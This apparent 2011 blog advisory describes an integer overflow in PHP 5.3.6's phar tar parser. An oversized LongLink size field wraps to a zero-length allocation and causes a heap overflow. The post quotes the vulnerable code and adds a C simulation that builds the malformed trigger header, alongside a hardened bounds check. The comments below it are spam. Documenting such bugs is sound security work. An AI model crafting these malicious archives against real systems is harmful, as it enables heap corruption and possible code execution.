Thursday, April 21, 2011

PHP (phar extension) heap overflow

version PHP:  5.3.6
version phar ext.: 1.1.1
site: http://php.net/
source code: http://windows.php.net/downloads/releases/php-5.3.6-src.zip

An integer overflow in phar_parse_tarfile() (file ..\php-5.3.6\ext\phar\tar.c) leads to a heap overflow while parsing a ././@LongLink entry of a tar-based phar.


int phar_parse_tarfile(php_stream* fp, char *fname, int fname_len, char *alias, int alias_len, phar_archive_data** pphar, int is_data, php_uint32 compression, char **error TSRMLS_DC) /* {{{ */
{
    //.....
    /* (*) size is taken straight from the 12-byte octal size field of the tar header, which the attacker controls */
    size = entry.uncompressed_filesize = entry.compressed_filesize =
        phar_tar_number(hdr->size, sizeof(hdr->size)); //(*)
    //.....
    if (!last_was_longlink && hdr->typeflag == 'L') {
        last_was_longlink = 1;
        /* support the ././@LongLink system for storing long filenames */
        entry.filename_len = entry.uncompressed_filesize;
        /* (**) filename_len is a php_uint32: 0xffffffff + 1 wraps to 0, so this allocates an empty buffer */
        entry.filename = pemalloc(entry.filename_len+1, myphar->is_persistent); //(**)

        /* (***) asks for up to 0xffffffff bytes into that buffer; the read is capped only by what the stream still holds */
        read = php_stream_read(fp, entry.filename, entry.filename_len); //(***)
    //.....

The size field of the tar header is attacker controlled, so entry.filename_len can be set to 0xffffffff (the octal string 37777777777 in the header). filename_len is a 32-bit unsigned field (php_uint32), so entry.filename_len+1 wraps to 0 and pemalloc() returns a zero-length buffer. php_stream_read() is then asked to read 0xffffffff bytes into it. php_stream_read() only caps the read at the amount of data the stream still holds, so the length of the heap overflow is bounded by, and its contents filled from, the bytes that follow the header in the archive: the attacker chooses both the size and the content of the overflow.
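As an added example (not code from this post or from PHP), the C program below reproduces the arithmetic described above on a constructed tar stream: an octal size parser with the same contract as phar_tar_number(), the wrapping filename_len+1, the php_stream_read() bound, and a hardened length check beside it. The 512-byte header layout (size field at offset 124, typeflag at offset 156) is the standard ustar layout; MAX_LONGLINK_NAME, tar_number, build_longlink_stream, simulate_vulnerable, safe_longlink_len and demo are names chosen for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* ustar header layout: 512-byte block, 12-byte octal size field at 124,
 * typeflag byte at 156. */
#define TAR_BLOCK      512
#define OFF_SIZE       124
#define OFF_TYPEFLAG   156
#define SIZE_FIELD_LEN 12
/* Assumed upper bound for a ././@LongLink name in the hardened variant. */
#define MAX_LONGLINK_NAME 4096u

/* Octal field parser with the same contract as phar_tar_number() in tar.c:
 * consume octal digits until a non-digit or the end of the field. The body
 * is written for this example, not copied from PHP. */
uint32_t tar_number(const char *buf, size_t len)
{
    uint32_t num = 0;
    for (size_t i = 0; i < len && buf[i] >= '0' && buf[i] <= '7'; i++)
        num = num * 8 + (uint32_t)(buf[i] - '0');
    return num;
}

/* Constructed sample archive: one 'L' (LongLink) header whose size field is
 * the attacker-chosen octal string, followed by payload_len bytes of 'A'.
 * Returns the stream length, or 0 if out is too small. */
size_t build_longlink_stream(unsigned char *out, size_t cap,
                             const char *size_octal, size_t payload_len)
{
    if (cap < TAR_BLOCK + payload_len) return 0;
    memset(out, 0, TAR_BLOCK + payload_len);
    memcpy(out, "././@LongLink", 13);
    strncpy((char *)out + OFF_SIZE, size_octal, SIZE_FIELD_LEN);
    out[OFF_TYPEFLAG] = 'L';
    memset(out + TAR_BLOCK, 'A', payload_len);
    return TAR_BLOCK + payload_len;
}

/* Mirrors the vulnerable arithmetic: filename_len is a php_uint32, so
 * filename_len + 1 is computed in 32-bit unsigned arithmetic and wraps.
 * *alloc_len is what pemalloc() would be asked for; *copied is what
 * php_stream_read() would actually write, i.e. min(requested, bytes left). */
int simulate_vulnerable(const unsigned char *stream, size_t stream_len,
                        uint32_t *alloc_len, size_t *copied)
{
    if (stream_len < TAR_BLOCK || stream[OFF_TYPEFLAG] != 'L') return -1;
    uint32_t filename_len = tar_number((const char *)stream + OFF_SIZE, SIZE_FIELD_LEN);
    *alloc_len = filename_len + 1;                    /* 0xffffffff + 1 == 0 */
    size_t avail = stream_len - TAR_BLOCK;
    *copied = (size_t)filename_len < avail ? (size_t)filename_len : avail;
    return 0;
}

/* Hardened variant: validate the untrusted length before any arithmetic and
 * before allocating. Rejects sizes above a sane name bound and sizes the
 * stream cannot actually supply; the +1 can no longer wrap. */
int safe_longlink_len(uint32_t filename_len, size_t bytes_remaining, size_t *alloc_len)
{
    if (filename_len > MAX_LONGLINK_NAME) return -1;
    if ((size_t)filename_len > bytes_remaining) return -1;  /* truncated archive */
    *alloc_len = (size_t)filename_len + 1;
    return 0;
}

/* Builds the constructed stream with size 0xffffffff and runs it through
 * the vulnerable path. */
static int demo(uint32_t *alloc_len, size_t *copied)
{
    unsigned char stream[TAR_BLOCK + 64];
    /* eleven octal sevens == 0xffffffff, the value the write-up describes */
    size_t n = build_longlink_stream(stream, sizeof stream, "37777777777", 64);
    return n ? simulate_vulnerable(stream, n, alloc_len, copied) : -1;
}

uint32_t demo_alloc_len(void)    { uint32_t a = 1; size_t c = 0; demo(&a, &c); return a; }
size_t   demo_bytes_copied(void) { uint32_t a = 1; size_t c = 0; demo(&a, &c); return c; }

int main(void)
{
    printf("pemalloc size requested: %u\n", demo_alloc_len());
    printf("bytes php_stream_read would write into it: %zu\n", demo_bytes_copied());
    return 0;
}
```

With the constructed 64-byte payload the vulnerable path requests a 0-byte allocation and then writes 64 bytes into it; a longer payload behind the header lengthens the overflow in the same way. The hardened check rejects 0xffffffff outright and also rejects any length the remaining stream cannot satisfy, so the allocation size is derived only from a value that has already been bounded.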

POC code (MIME encoded):
php_phar.zip begin
end

7 comments:

  1. Nice blog. Thanks for sharing this blog information with us.

    Web Development Company Chennai

  2. I believe web time sheet software makes the complete employee time clock tracking task easier. It's easy to update, approve and maintain the time sheets in no time. Time Attendance System

  3. I agree with you. This post is truly inspiring. I like your post, and everything you share with us is current and very informative. I want to bookmark the page so I can return here. You have done a fantastic job.
    Web developer

  4. Hi,

    Blog programming: favourite tutorials and websites of the internet in your browser. My site has many tutorials and online earning guides, so I share my site with you, friends. If you want to earn money sitting at home, you can follow my site http://freelancetube.blogspot.com/

    I have listed there a lot of Photoshop and Illustrator tutorials, earning tutorials, etc. Visiting my site will not hamper you in any way; rather, you will benefit.

    http://freelancetube.blogspot.com/

  5. This blog is really informative; I really had fun reading it.

    php

  6. Hi,
    Hey. Good to know that it was helpful. Makes me feel better about putting the time in to write it up. :)

    As you go through the process, definitely add comments if your experience varies from mine, so that the next person can benefit.

    Time Attendance System In Chennai
